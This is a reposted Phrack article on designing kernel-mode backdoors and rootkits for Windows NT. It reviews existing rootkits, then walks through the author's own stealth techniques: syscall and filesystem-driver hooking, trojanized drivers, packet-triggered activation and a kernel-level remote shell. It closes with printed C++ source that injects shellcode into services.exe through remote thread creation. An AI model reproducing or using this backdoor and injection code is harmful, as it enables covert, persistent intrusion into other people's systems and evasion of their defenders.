[转载]Kernel-mode backdoors for Windows NT

来源:飞客杂志
==Phrack Inc.==

          Volume 0x0b, Issue 0x3e, Phile #0x06 of 0x10


|=---------------=[ Kernel-mode backdoors for Windows NT ]=--------------=|
|=-----------------------------------------------------------------------=|
|=-----------------=[ firew0rker <firew0rker@nteam.ru> ]=----------------=|
|=----------------=[ the nobodies <http://www.nteam.ru> ]=---------------=|

--[ Table of contents

  1 - PREFACE

  2 - OVERVIEW OF EXISTING KERNEL-MODE BACKDOORS FOR WINDOWS NT
   2.1 - NTROOTKIT
   2.2 - HE4HOOK
   2.3 - SLANRET (IERK, BACKDOOR-ALI)

  3 - OBSCURITY ON DISK, IN REGISTRY AND IN MEMORY

  4 - MY VARIANT: THORNY PATH
   4.1 - SHELL
   4.2 - ACTIVATION AND COMMUNICATION WITH REMOTE CLIENT
   4.3 - OBSCURITY ON DISK

  5 - CONCLUSION
  6 - EPILOGUE
  7 - LIST OF USED SOURCES
  8 - FILES

--[ 1 - Preface

   This article is intended for those who know the architecture of the
Windows NT kernel and the principles of operation of NT drivers. This
article examines issues involved in the development of kernel-mode tools
for stealthy remote administration of Windows NT.

   Recently there has been a tendency of extending the use of Windows NT
(2000, XP, 2003) from it&#39;s classical stronghold as home and
office OS to servers. At the same time, the outdated Windows 9x family is
replaced by the NT family. Because of this it should be evident that remote
administration tools (backdoors) and unnoticeable access tools (rootkits)
for the NT family have a certain value. Most of the published utilities
work in user-mode and can thus be detected by Antivirus tools or by manual
inspection.

   It&#39;s quite another matter those works in kernel-mode: They can hide
from any user-mode program. Antivirus software will have to suplly kernel-
mode components in order to detect a kernel-mode-backdoor. Software exists
that protects against such backdoors (such as IPD, "Integrity Protection
Driver"), but it&#39;s use is not widely spread. Kernel mode backdoors are not
as widely used as they could be due to their relative complexity in comp-
arison with user-mode backdoors.

--[ 2 - Overview of existing Kernel-Mode backdoors for Windows NT

   This section briefly reviews existing kernel-mode backdoors for Windows
   NT.
   
----[ 2.1 - Ntrootkit
   
   Ntrootkit (c) by Greg Hoglund and a team of free developers [1] is a
device driver for Windows NT 4.0 and 2000. It&#39;s possibilities (implemented
and potential):

- Receiving commands from a remote client. The rk_packet module contains
  a simplified IP-stack, which uses free IP-address from the subnet where
  the host on which Ntrootkit has been installed is situated.

  It&#39;s MAC and IP addresses are hardcoded in the source. Connection with
  the rootkit at that IP is carried out via a TCP connection to any port.
  The available commands in rk_command.c are:

     ps - list processes
     help - self explainatory
     buffertest, echo and debugint - for debugging purpose
     hidedir - hide directory/file
     hideproc - hide process(es)
     sniffkeys - keyboard spy

  There are also imcomplete pieces of code: Execute commands received via
  a covert channel and starting a Win32-process from a driver (a hard and
  complicated task).

- Encrypt all traffic using Schneier&#39;s Blowfish algorithm:
  rk_blowfish.c is present, but not (yet ?) used

- Self-defense (rk_defense.c) - hide protected objects (in this
  case: registry keys), identified by the string "_root_"; redirect
  launched processes.

  The hiding of processes, directories and files as implemented in
  rk_ioman.c is done through hooking the following functions:
  
     NtCreateFile
     ZwOpenFile
     ZwQueryDirectoryFile
     ZwOpenKey
     ZwQueryKey
     ZwQueryValueKey
     ZwEnumerateValueKey
     ZwEnumerateKey
     ZwSetValueKey
     ZwCreateKey

  The way to detect this rootkit:

  Make direct request to filesystem driver, send IRP to it. There is
  one more module that hooks file handling: rk_files.c, adopted from
  filemon, but it is not used.

- Starting processes: An unfinished implementation of it can be found
  in rk_command.c, another one (which is almost complete and good) is
  in rk_exec.c

  The implementation suffers from the fact that Zw* functions which are
  normally unavailable to drivers directly are called through the system
  call interface (int 0x2E), leading to problems with different versions
  of the NT family as system call numbers change.

   It seems like the work on Ntrootkit is very loosely coordinated: every
   developer does what (s)he considers needed or urgent. Ntrootkit does
   not achieve complete (or sufficient) invisibility. It creates device
   named "Ntroot", visible from User-Mode.

   When using Ntrootkit for anything practical, one will need some means
of interaction with the rootkitted system. Shortly: There will be the
need for some sort of shell. Ntrootkit itself can not give out a shell
directly, although it can start a process -- the downside is that the
I/O of that process can not be redirected. One is thus forced to start
something like netcat. It&#39;s process can be hidden, but it&#39;s TCP-connection
will be visible. The missing redirection of I/O is a big drawback.
   
   However, Ntrootkit development is still in progress, and it will
probably become a fully-functional tool for complete and stealthy remote
administration.

----[ 2.2 - He4Hook

   This description is based on [2]. The filesystem access was hooked via
two different methods in the versions up to and including 2.15b6. Only one
of it works at one time, and in versions after 2.15b6 the first method was
removed.

Method A: hook kernel syscalls:
===============================

ZwCreateFile, ZwOpenFile    - driver version 1.12 and from 1.17 to
                      2.15beta6
IoCreateFile            - from 1.13 to 2.15beta6
ZwQueryDirectoryFile, ZwClose - before 2.15beta6

Almost all these exported functions (Zw*) have the following function
body:
  mov eax, NumberFunction
  lea edx, [esp+04h]
  int 2eh                ; Syscall interface

   The "NumberFunction" is the number of the called function in the
syscalls table (which itself can be accessed via the global variable
KeServiceDescriptorTable). This variable points to following structure:

typedef struct SystemServiceDescriptorTable
  {
   SSD  SystemServiceDescriptors[4];
  } SSDT, *LPSSDT;

Other structures:

typedef VOID *SSTAT[];
typedef unsigned char SSTPT[];
typedef SSTAT *LPSSTAT;
typedef SSTPT *LPSSTPT;

typedef struct SystemServiceDescriptor
  {
   LPSSTAT lpSystemServiceTableAddressTable;
   ULONG  dwFirstServiceIndex;
   ULONG  dwSystemServiceTableNumEntries;
   LPSSTPT lpSystemServiceTableParameterTable;
  } SSD, *LPSSD;

The DescriptorTable pointed to by KeServiceDescriptorTable is only
accessible from kernel mode. In User-Mode, there is something called
KeServiceDescriptorTableShadow -- unfortunately it is not exported.

Base services are in

KeServiceDescriptorTable->SystemServiceDescriptors[0]
KeServiceDescriptorTableShadow->SystemServiceDescriptors[0]

KernelMode GUI services are in
KeServiceDescriptorTableShadow->SystemServiceDescriptors[1]

   Other elements of that tables were free at moment when [2] was
written, in all versions up to WinNt4(SP3-6) and Win2k build 2195.
Each element of the table is a SSID structure, which contains the
following data:

lpSystemServiceTableAddressTable  - A pointer to an array of addresses
                         of functions that will be called if
                         a matching syscall is called
                        
dwFirstServiceIndex           - Start index for the first function

dwSystemServiceTableNumEntries    - Number of services in table

lpSystemServiceTableParameterTable - An array of bytes specifying the
                         number of bytes from the stack that
                         will be passed through

In order to hook a system call, He4HookInv replaces the address stored in
KeServiceDescriptorTable->SystemServiceDescriptos[0].lpSystemServiceTableAddressTableIn
with a pointer to it&#39;s own table.

One can interface with He4HookInv by adding your own services to the
system call tables. He4HookInv updates both tables:

- KeServiceDescriptorTable
- KeServiceDescriptorTableShadow.

Otherwise, if it updated only KeServiceDescriptorTable, new services
would be unavailable from UserMode. To locate KeServiceDescriptorTable-
Shadow the following technique is used:

   The function KeAddSystemServiceTable can be used to add services to the
kernel. It can add services to both tables. Taking into account that its
0-th descriptor is identical, it&#39;s possible, by scanning
KeAddSystemServiceTable function&#39;s code, to find the address of the shadow
table. You can see how it is done in file He4HookInv.c, function
FindShadowTable(void).

   If this method fails for some reason, a hardcoded address is taken
(KeServiceDescriptorTable-0x230) as location of the shadow table. This
address has not changed since WinNT Sp3. Another problem is the search
for the correct index into the function address array. As almost all Zw*
functions have an identical first instruction (mov eax, NumberFunction),
one can get a pointer to the function number easily by adding one byte
to the address exported by ntoskrnl.exe

Method B: (for driver versions 2.11 and higher)
===============================================

   The callback tables located in the DRIVER_OBJECT of the file system
drivers are patched: The IRP handlers of the needed drivers are replaced.
This includes replacing the pointers to base function handlers
(DRIVER_OBJECT->MajorFunction) as well as replacing pointers to the
drivers unload procedure (DRIVER_OBJECT->DriverUnload).

The following functions are handled:

IRP_MJ_CREATE
IRP_MJ_CREATE_NAMED_PIPE
IRP_MJ_CREATE_MAILSLOT
IRP_MJ_DIRECTORY_CONTROL -> IRP_MN_QUERY_DIRECTORY

For a more detailed description of the redirection of file operations
refer to the source [2].

----[ 2.3 - Slanret (IERK, Backdoor-ALI)

   The source code for this is unavailable -- it was originally disco-
vered by some administrator on his network. It is a normal driver
("ierk8243.sys") which periodically causes BSODs, and is visible as a
service called "Virtual Memory Manager".

      "Slanret is technically just one component of a
      root kit. It comes with a straightforward backdoor
      program: a 27 kilobyte server called "Krei" that
      listens on an open port and grants the hacker remote
      access to the system. The Slanret component is a
      seven kilobyte cloaking routine that burrows into the
      system as a device driver, then accepts commands from
      the server instructing it on what files or processes
      to conceal." [3]

----[ 3. Stealth on disk, in registry and in memory

   The lower the I/O interception in a rootkit is performed, the harder
it usually is to detect it&#39;s presence. One would think that a reliable
place for interception would be the low-level disk operations (read/write
sectors). This would require handling all filesystems that might be on
the hard disk though: FAT16, FAT32, NTFS.

   While FAT was relatively easy to deal with (and some old DOS stealth
viruses used similar techniques) an implementation of something similar
on WinNT is a task for maniacs.

   A second place to hook would be hooking dispatch functions of file-
system drivers: Patch DriverObject->MajorFunction and FastIoDispatch in
memory or patch the drivers on disk. This has the advantage of being re-
latively universal and is the method used in HE4HookInv.

   A third possibility is setting a filter on a filesyste driver (FSD).
This has no advantages in comparison with the previous method, but has
the drawback of being more visible (Filemon uses this approach). The
functions Zw*, Io* can then be hooked either by manipulating the Ke-
ServiceDescriptorTable or directly patching the function body. It is
usually quite easy to detect that pointers in KeServiceDescriptorTable
point to strange locations or that the function body of a function has
changed. A filter driver is also easy to detect by calling IoGetDevice-
ObjectPointer and then checking DEVICE_OBJECT->StackSize.

   All normal drivers have their own keys in the registry, namely in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

   The abovementioned rootkits can hide registry keys, but obviously,
if the system is booted "cleanly", an administrator can see anything that
was hidden. One can also load a rootkit using ZwSetSystemInformation(
SystemLoadAndCallimage) without the need to create any registry keys. An
example of this technique can be found in [6].

   A rootkit loader in a separate file is too unstealthy. It might be a
smarter move to patch that call into some executable file which is part of
the system boot. One can use any driver or user-mode program that works
with sufficient privileges, or any DLL linked to by it. One has to ask one
question though: If the newly introduced changes need to be hidden anyway,
why make two similar but differing procedures (for hiding changes to a
file as well as hiding the existance of a file) instead of limiting our-
selves to one ?

   In most cases one can target null.sys. Implementing it&#39;s functionality
is as easy as "hello world", and that is why it is usually replaced with a
trojan. But if we are going to have a procedure for hiding changes to a
file, we can replace ANY driver with a trojan that will substitute the
content of the replaced file with the original content to everyone (incl-
uding the kernel). Upon startup, it will copy itself to some allocated
memory area and start a thread there.

   This will make the trojan almost unnoticeable in memory: No system
utility can see the driver any more, as it is just an anonymous memory
page amongst many. We do not even need a thread, using intercepted IRP
dispatch functions of some driver (DriverObject->MajorFunction[IRP_MJ_xxx]).
We can also use IoQueueWorkItem and KeInsertQueueDpc, so no additional
threads in SYSTEM will be visible in the task manager. After this is done
the trojan can unload the driver it was started from, and reload it in a
clean (unchanged) variant. As a result, high levels of stealth will be
achieved by relatively simple means. The original content of the manipu-
lated file could for example be stored in the trojan&#39;s file after the
trojan itself.

   It will then be sufficient to hook all FSD requests (IRP and FastIO)
and upon access change the position (and size of the file).
(CurrentIrpStackLocation->Parameters.*.ByteOffset)
   
--[ 4 - My variant: The thorny path

----[ 4.1 - Shell

   I originally intended to do something similarily simple as standard
user-mode code: Just pass a socket handle for stdin/stdout/stderr to the
newly created cmd.exe process. I did not find a way to open a useful
socket from a driver though, as the interface with the AFD driver (kmode
core of winsock) is undocumented. Reverse-engineering it&#39;s usage was not
an option either as due to changes between versions my technique would be
unreliable. I had to find a different way.

First variant
=============

   We could start our code in the context of some process, using a shell-
code quite similar to that used in exploits. The code could wait for a TCP
connection and start cmd.exe with redirected I/O.

   I chose this way when I tired of trying to start a full-fledged win32
process from a driver. The shellcode is position-independent, searches for
kernel32.dll in memory and loads the winsock library. All that needs to be
done is injecting the shellcode into the address space of a process and
pass control to the entry point of the shellcode. However, in the process
of doing this the normal work of the process must not be interrupted, be-
cause a failure in a critical system process will lead to a failure of the
whole system.

   So we need to allocate memory, write shellcode there, and create a
thread with EIP = entry point of the shellcode. Code to do this can be
found in the attached file shell.cpp. Unfortunately, when CreateProcess
is called from the thread started in this way it failed, most probably
because something that CreateProcess relies upon was not initialized pro-
poerly in the context of our thread. We thus need to call CreateProcess
from a thread context which has everything that CreateProcess needs ini-
tialized -- we&#39;re going to take a thread which belongs to the process we
are intruding into (I used SetThreadContext for that). One needs to re-
store the state of the thread prior to the interruption so it can contiue
it&#39;s normal operation.

   So we need to: Save thread context via GetThreadContext, set the EIP
to our context via SetThreadContext, wait for the code to complete, and
then restore the original cont again. The rest is just a usual shellcode
for Windows NT (full code in dummy4.asm).

   One unsolved problem remains: If the thread is in waiting state, it
will not run until it wakes up. Using ZwAlertThread does not yield any re-
sult if the thread is in a nonalertable wait state. Fortunately, the
thread in services.exe worked without a problem -- this does not imply it
will stay like this in the future though, so I continued my research:

Second variant
==============

   Things are not as easy as [4] makes them sound. Creating a full-
fledged win32-process requires it&#39;s registration in the CSRSS subsystem.
This is accomplished by using CsrClientCallServer(), which receives all
necessary information about the process (handles, TID, PID, flags). The
functions calls ZwRequestWaitReplyPort, which receives a handle of a pre-
viously opened port for connection with CSRSS.

   This port is not open in the SYSTEM process context. Opening it never
succeeded (ZwConnectPort returned STATUS_PORT_CONNECTION_REFUSED). Play-
ing with SECURITY_QUALITY_OF_SERVICE didn&#39;t help. While disassembling
ntdll.dll I saw that ZwConnectPort calls were preceded by ZwCreateSection.
But there was no time and no desire to play with sections. Here is the
code that didn&#39;t work:

VOID InformCsrss(HANDLE hProcess,HANDLE hThread,ULONG pid,ULONG tid)
{
      CSRMSG                csrmsg;
      HANDLE                hCurProcess;
      HANDLE                handleIndex;
      PVOID                p;

      _asm int 3;

      UNICODE_STRING           PortName;
      RtlInitUnicodeString(&PortName,L"\\Windows\\ApiPort");
      static  SECURITY_QUALITY_OF_SERVICE QoS =
           {sizeof(QoS), SecurityAnonymous, 0, 0};
      /*static  SECURITY_QUALITY_OF_SERVICE QoS =
           {0x77DC0260,
           (_SECURITY_IMPERSONATION_LEVEL)2, 0x120101, 0x10000};*/
      DWORD ret=ZwConnectPort(&handleIndex,&PortName,&QoS,NULL,
                      NULL,NULL,NULL,NULL);
           
      if (!ret) {
           RtlZeroMemory(&csrmsg,sizeof(CSRMSG));
           
           csrmsg.ProcessInformation.hProcess=hProcess;
           csrmsg.ProcessInformation.hThread=hThread;
           csrmsg.ProcessInformation.dwProcessId=pid;
           csrmsg.ProcessInformation.dwThreadId=tid;
           
           csrmsg.PortMessage.MessageSize=0x4c;
           csrmsg.PortMessage.DataSize=0x34;
           
           csrmsg.CsrssMessage.Opcode=0x10000;
           
      
      ZwRequestWaitReplyPort(handleIndex,(PORT_MESSAGE*)&csrmsg,
                              (PORT_MESSAGE*)&csrmsg);
      }
}

   The solution to the problem was obvious; Switch context to one in
which the port is open, e.g. to the context of any win32-process. I inser-
ted KeAttachProcess(HelperProcess) before calling Nebbet&#39;s InformCsrss,
and KeDetachProcess afterwards. The role of the HelperProcess was taken
by calc.exe.

   When I tried using KeAttachProcess that way I failed though: The con-
text was switched (visible using the proc command in SoftICE), but Csr-
ClientCallServer returned STATUS_ILLEGAL_FUNCTION. Only Uncle Bill knows
what was happening inside CSRSS.
   
   When trying to frame the whole process creation function into
KeAttachProcess/KeDetachProcess led to the following error when calling
ZwCreateProcess: "Break Due to KeBugCheckEx (Unhandled kernel mode
exception) Error=5 (INVALID_PROCESS_ATTACH_ATTEMPT) ... ".

   A different way to execute my code in the context of an arbitrary
process is APC. The APC may be kmode or user-mode. As long as only kmode
APC may overcome nonalertable wait state, all code for process creation
must be done in kernel mode. Nebbet&#39;s code normally works at
  IRQL == APC_LEVEL
Code execution in the context of a given win32-process by means of APC is
implemented in the StartShell() function, in file ShellAPC.cpp.
   
Interaction with the process
=============================

   Starting a process isn&#39;t all. The Backdoor still needs to communicate
with it: It is necessary to redirect it&#39;s stdin/stdout/stderr to our
driver. We could do this like most "driver+app"-systems: Create a device
that is visible from user-mode, open it using ZwOpenFile and pass the
handle to the starting process (stdin/stdout/stderr). But a named device
is not stealthy, even if we automatically create a random names. This is
why I have chosen to use named pipes instead.
   
   Windows NT uses named pipes with names like Win32Pipes.%08x.%08x (here
%08x is random 8-digit numbers) for emulation of anonymous pipes. If we
create one more such pipe, nobody will notice. Usually, one uses 2 anon-
ymous pipes r redirecting I/O of a console application in Win32, but when
using a named pipe one will be sufficient as it is bi-directional. The
driver must create a bi-directional named pipe, and cmd.exe must use it&#39;s
handle as stdin/stdout/stderr.

   The handle can be opened in both kmode and user-mode. The final ver-
sion uses the first variant, but I have also experimented with the second
variant -- being able to implement different variants may help evade anti-
viruses. Starting a process with redirected I/O has been completely imple-
mented in kernel mode in the file NebbetCreateProcess.cpp.

   There are two main differences between my and Nebbet&#39;s code: The fun-
ctions that are not exported from ntoskrnl.exe but from ntdll, are dyn-
amically imported (see NtdllDynamicLoader.cpp). The handle to the named
pipe is opened with ZwOpenFile() and passed to the starting process with
ZwDuplicateObject with DUPLICATE_CLOSE_SOURCE flag.

   For opening the named pipe from user mode I inject code into a start-
ing process. I attached the patch (NebbetCreateProcess.diff) for edu-
cational purposes. It adds a code snippet to a starting process. The
patch writes code (generated by a C++ compiler) to a process&#39;s stack. For
independence that code is a function which accepts a pointer to a struc-
ture containing all the necessary data (API addresses etc) as parameter.
This structure and a pointer to it are written to the stack together with
the code of the function itself. ESP of the starting thread is set 4 bytes
bellow the pointer to the parameters of the function, and EIP to it&#39;s en-
try point. Once the injected code is done executing, it issues a CALL back
to the original entry point. This example can be modified to be yet
another way of injecting code into a working userland process from kernel
mode.

---[ 4.2 - Activation and communication with the remote client

   If a listening socket is permanently open (and visible to netstat -an)
it is likely to be discovered. Even if one hides the socket from netstat
is insufficient as a simple portscan could uncover the port. To remain
stealthy a backdoor must not have any open ports visible locally or re-
motely. It is necessary to use a special packet, which on the one hand
must be unambigously identified by the backdoor as activation signal, yet
at the same time must not be so suspicious as to trigger alerts or be fil-
tered by firewalls. The activation signal could e.g. be a packet contain-
ing a set of packets at any place (header or data) -- all characteristics
of the packet (protocol, port etc) should be ignored. This allows for max-
imum flexibility to avoid aggressive packet filters.

   Obviously, we have to implement some sort of sniffer in order to
detect such a special packet. In practice, we have several choices on how
to implement the sniffer:

1) NDIS protocol driver (advantage: possibility not only to receive
  packets, but also to send - thus making covert channel for
  communication with remote client possible; disadvantage: difficulties
  with supporting all types of network devices) - applied in ntrootkit;

2) use service provided by IpFilterDriver on w2k and higher
  (advantages: simple implementation and complete independence
  from physical layer; disadvantage: receive only);

3) setup filter on 1 of network drivers, through which packets pass
  through (see [5]);

4) direct appeal to network drivers by some other means for receive
  and send packets (advantage: can do everything; disadvantage:
  unexplored area).

   I have chosen variant 2 due to it&#39;s simplicity and convenience for both
described variants of starting a shell. IpFilterDriver used only for
activation, further connection is made via TCP by means of TDI.

   An example of the usage of IpFilterDriver can be seen in Filtering.cpp
and MPFD_main.cpp. InitFiltering() loads the IpFilterDriver if it isn&#39;t
yet loaded. Then it calls SetupFiltering, which sets a filter with
IOCTL_PF_SET_EXTENSION_POINTER IOCTL. PacketFilter() is then called on
each IP packet. If a keyword is detected StartShellEvent is set and causes
a shell to be started.

   The variant using shellcode in an existing process works with the
network in user-mode, thus we do not need to describe anything in detail.
   
   A Kernel-mode TCP shell is implemented in NtBackd00r.cpp. When cmd.exe
is started from a driver with redirected I/O, the link is maintained by
the driver. I took the tcpecho example as base for the communitcation mod-
ule in order not to waste time coding a TDI-client from scratch.
DriverEntry() initialises TDI, creates a listening socket and an unnamed
device for IoQueueWorkItem.

   For each conenction an instance of the Session class is created. In
it&#39;s OnConnect handler a sequence of operations for creating a process.
process. As long as this handler is called at IRQL==DISPATCH_LEVEL, it&#39;s
impossible to do all necessary operations directly in it. It&#39;s even
impossible to start a thread because PsCreateSystemThread must be called
only at PASSIVE_LEVEL according to the DDK. Therefore the OnConnect
handler calls IoAllocateWorkItem and IoQueueWorkItem in order to do any
further operations accomplished in WorkItem handler (ShellStarter
function) at PASSIVE_LEVEL.

   ShellStarter calls StartShell() and creates a worker thread
(DataPumpThread) and 2 events for notifying it about arriving packets and
named pipe I/O completion. Interaction between the WorkItem/thread and
Session class was built with taking a possible sudden disconnect and
freeing Session into account: syncronisation is accomplished by disabling
interrupts (it&#39;s equivalent of raise IRQL to highest) and by means of
DriverStudio classes (SpinLock inside). The Thread uses a copy of some
data that must be available even after instance of Session was deleted.

   Initially, DataPumpThread starts one asynchronous read operation
(ZwReadFile) from named pipe -- event hPipeEvents[1] notifies about it&#39;s
completion. The other event hPipeEvents[0] notifies about data arrival
from the network. After that ZwWaitForMultipleObjects executed in a loop
waits for one of these events. In dependence of what event was signaled,
the thread does a read from the named pipe and sends data to client, or
does a read read from FIFO and writes to pipe. If the Terminating flag
is set, thread closes all handles, terminates the cmd.exe process, and
then terminates itself. Data arrival is signaled by the hPipeEvents[0]
event in Session::OnReceive and Session::OnReceiveComplete handlers.
It also used in conjunction with the Terminating flag to notify the thread
about termination.

   Data resceived from the network is buffered in pWBytePipe FIFO.
DataPumpThread reads data from the FIFO to temporary buffers which are
allocated for each I/O operation and writes data asynchronously to the
pipe (ZwWriteFile). The buffers are freed asynchronously in the ApcCallback-
WriteComplete handler.

   Data transfers from the pipe to the network are also accomplished through
temporary buffers that are allocated before ZwReadFile and freed in
Session::OnSendComplete.

Paths of data streams and temporary buffers handling algorithm:

NamedPipe -(new send_buf; ZwReadFile)-> temporary buffer

send_buf -(send)-> Network -> OnSendComplete{delete send_buf}

Network -(OnReceive)-> pWBytePipe -(new rcv_buf)-> temporary

buffer rcv_buf -(ZwWriteFile)-> NamedPipe ->
                      ApcCallbackWriteComplete{delete rcv_buf}

   In Session::OnReceive handler data is written to the FIFO and the
DataPumpThread is notified about it&#39;s arrival. If the transport has more
data available than indicated another buffer is allocated to read the
rest. When the transport is done - asynchronously - OnReceiveComplete()
handler is called, which does the same as OnReceive.

----[ 4.3 - Stealth on disk

   I&#39;ve implemented simple demo module (file Intercept.cpp) which hooks
dispatch functions of a given filesystem diver to hide the first N bytes of
a given file. To hook FSD call e.g. Intercept(L"\\FileSystem\\Fastfat").
There is only 2 FSDs that may be necessary to hook: Fastfat ant Ntfs,
because NT can boot from these filesystems.

   Intercept() replaces some driver dispatch functions
(pDriverObject->MajorFunction[...], pDriverObject->FastIoDispatch->...).

   When hooked driver handles IRPs and FastIo calls the corresponding hook
functions modifies file size and current file offset. Thus all user-mode
programs see file N bytes smaller than original, containing bytes N to
last. It allows to implement trick described in part 3.

--[ 5 - Conclusion

   In this article I compared 3 existing Kernel-Mode backdoors for
Windows NT from a programmers point of view, presented some ideas on making
a backdoor stealthier as well as my thorny path of writing my own Kernel-
Mode backdoor.

   What we did not describe was a method of hiding open sockets and TCP
connections from utilities such as netstat and fport. Netstat uses
SnmpUtilOidCpy(), and fport talks directly with drivers
(\Device\Udp and \Device\Tcp). To hide something from these and all
similar tools, it&#39;s necessary to hook aforementioned drivers with one of
methods mentioned in section "Stealth on disk, in registry and in
memory". I did not explore that issue yet. Probably, its consideration
deserves a separate article. Advice for those who decided to move this
direction: begin with the study of IpLog sources [5].

--[ 6 - Epilogue

   When/if this article will be published in Phrack, the article itself
(probably improved and supplemented), its Russian original, and full code
of all used examples will be published at our site http://www.nteam.ru

--[ 7 - List of used sources

1. http://rootkit.com
2. "LKM-attack on WinNT/Win2k"
  http://he4dev.e1.bmstu.ru/He4ProjectRepositary/HookSysCall/
3. "Windows Root Kits a Stealthy Threat"
  http://www.securityfocus.com/news/2879
4. Garry Nebbet. Windows NT/2000 native API reference.
5. "IP logger for WinNT/Win2k"
  http://195.19.33.68/He4ProjectRepositary/IpLog/

--[ 8 - Files

----[ 8.1 - Shell.CPP

#include "ntdll.h"
#include "DynLoadFromNtdll.h"
#include "NtdllDynamicLoader.h"

#if (DBG)
#define dbgbkpt __asm int 3
#else
#define dbgbkpt
#endif

const StackReserve=0x00100000;
const StackCommit= 0x00001000;
extern BOOLEAN Terminating;

extern "C" char shellcode[];
extern "C" const CLID_addr;
extern "C" int const sizeof_shellcode;

namespace NT {
typedef struct _SYSTEM_PROCESSES_NT4 { // Information Class 5
   ULONG NextEntryDelta;
   ULONG ThreadCount;
   ULONG Reserved1[6];
   LARGE_INTEGER CreateTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER KernelTime;
   UNICODE_STRING ProcessName;
   KPRIORITY BasePriority;
   ULONG ProcessId;
   ULONG InheritedFromProcessId;
   ULONG HandleCount;
   ULONG Reserved2[2];
   VM_COUNTERS VmCounters;
   SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES_NT4, *PSYSTEM_PROCESSES_NT4;
}

BOOL FindProcess(PCWSTR process, OUT NT::PCLIENT_ID ClientId)
{
      NT::UNICODE_STRING ProcessName;
      NT::RtlInitUnicodeString(&ProcessName,process);
      ULONG n=0xFFFF;
      PULONG q =
           (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
   while (NT::ZwQuerySystemInformation(
      NT::SystemProcessesAndThreadsInformation, q, n * sizeof *q, 0))
      {
           NT::ExFreePool(q);
           n*=2;
           q = (PULONG)NT::ExAllocatePool
                (NT::NonPagedPool,n*sizeof(*q));
      }

      ULONG MajorVersion;
      NT::PsGetVersion(&MajorVersion, NULL, NULL, NULL);

   NT::PSYSTEM_PROCESSES p
      = NT::PSYSTEM_PROCESSES(q);
   BOOL found=0;
      char** pp=(char**)&p;
   do
      {
           if ((p->ProcessName.Buffer)&&(!NT::RtlCompareUnicodeString
                (&p->ProcessName,&ProcessName,TRUE)))
           {
                if (MajorVersion<=4)
                      *ClientId = ((NT::PSYSTEM_PROCESSES_NT4)p)->Threads[0].ClientId;
                      else *ClientId = p->Threads[0].ClientId;
                found=1;
                break;
           }
           if (!(p->NextEntryDelta)) break;
           *pp+=p->NextEntryDelta;
      } while(1);
      
      NT::ExFreePool(q);
   return found;
}

VOID StartShell()
{
      //Search ntdll.dll in memory
      PVOID pNTDLL=FindNT();      
      //Dynamicaly link to functions not exported by ntoskrnl,
      //but exported by ntdll.dll
      DYNAMIC_LOAD(ZwWriteVirtualMemory)
      DYNAMIC_LOAD(ZwProtectVirtualMemory)
      DYNAMIC_LOAD(ZwResumeThread)
      DYNAMIC_LOAD(ZwCreateThread)
      HANDLE  hProcess=0,hThread;
      //Debug breakpoint
      dbgbkpt;
      NT::CLIENT_ID clid;
      //Code must be embedded into thread, which not in nonalertable wait state.
      //Such thread is in process services.exe, let&#39;s find it
      if(!FindProcess(L"services.exe"/*L"calc.exe"*/,&clid)) {dbgbkpt;
           return;};
      NT::OBJECT_ATTRIBUTES attr={sizeof(NT::OBJECT_ATTRIBUTES), 0,NULL, OBJ_CASE_INSENSITIVE};
      //Open process - get it&#39;s descriptor
      NT::ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &clid);
      if (!hProcess) {dbgbkpt;
           return;};
      /*NT::PROCESS_BASIC_INFORMATION pi;
      NT::ZwQueryInformationProcess(hProcess, NT::ProcessBasicInformation, &pi, sizeof(pi), NULL);*/
      ULONG n = sizeof_shellcode;
      PVOID p = 0;
      PVOID EntryPoint;

      //Create code segment - allocate memory into process context
      NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      if (!p) {dbgbkpt;
           return;};

      //*((PDWORD)(&shellcode[TID_addr]))=(DWORD)clid.UniqueThread;
      //Write process and thread ID into shellcode, it will be needed for
      //further operations with that thread
      *((NT::PCLIENT_ID)(&shellcode[CLID_addr]))=(NT::CLIENT_ID)clid;
      //Write shellcode to allocated memory
      ZwWriteVirtualMemory(hProcess, p, shellcode, sizeof_shellcode, 0);
      //Entry point is at the beginning of shellcode
      EntryPoint = p;

      //Create stack segment
   NT::USER_STACK stack = {0};
   n = StackReserve;
   NT::ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,
                      MEM_RESERVE, PAGE_READWRITE);
      if (!stack.ExpandableStackBottom) {dbgbkpt;
           return;};
   stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom)
                    + StackReserve;
   stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase)
                     - StackCommit;
   n = StackCommit + PAGE_SIZE;
   p = PCHAR(stack.ExpandableStackBase) - n;
      //Create guard page
      NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_READWRITE);
   ULONG x; n = PAGE_SIZE;
   ZwProtectVirtualMemory(hProcess, &p, &n,
                     PAGE_READWRITE | PAGE_GUARD, &x);
      //Initialize new thread context
      //similar to it&#39;s initialization by system
   NT::CONTEXT context = {CONTEXT_FULL};
   context.SegGs = 0;
   context.SegFs = 0x38;
   context.SegEs = 0x20;
   context.SegDs = 0x20;
   context.SegSs = 0x20;
   context.SegCs = 0x18;
   context.EFlags = 0x3000;
   context.Esp = ULONG(stack.ExpandableStackBase) - 4;
   context.Eip = ULONG(EntryPoint);
      NT::CLIENT_ID cid;

      //Create and start thread
   ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &attr,
                hProcess, &cid, &context, &stack, TRUE);

      //Here i tried to make thread alertable. The try failed.
      /*HANDLE hTargetThread;
      NT::ZwOpenThread(&hTargetThread, THREAD_ALL_ACCESS, &attr, &clid);
      PVOID ThreadObj;
      NT::ObReferenceObjectByHandle(hTargetThread, THREAD_ALL_ACCESS, NULL, NT::KernelMode, &ThreadObj, NULL);
      *((unsigned char *)ThreadObj+0x4a)=1;*/

   ZwResumeThread(hThread, 0);
}


VOID ShellStarter(VOID* StartShellEvent)
{
      do if (NT::KeWaitForSingleObject(StartShellEvent,NT::Executive,NT::KernelMode,FALSE,NULL)==STATUS_SUCCESS)
           if (Terminating) NT::PsTerminateSystemThread(0); else StartShell();
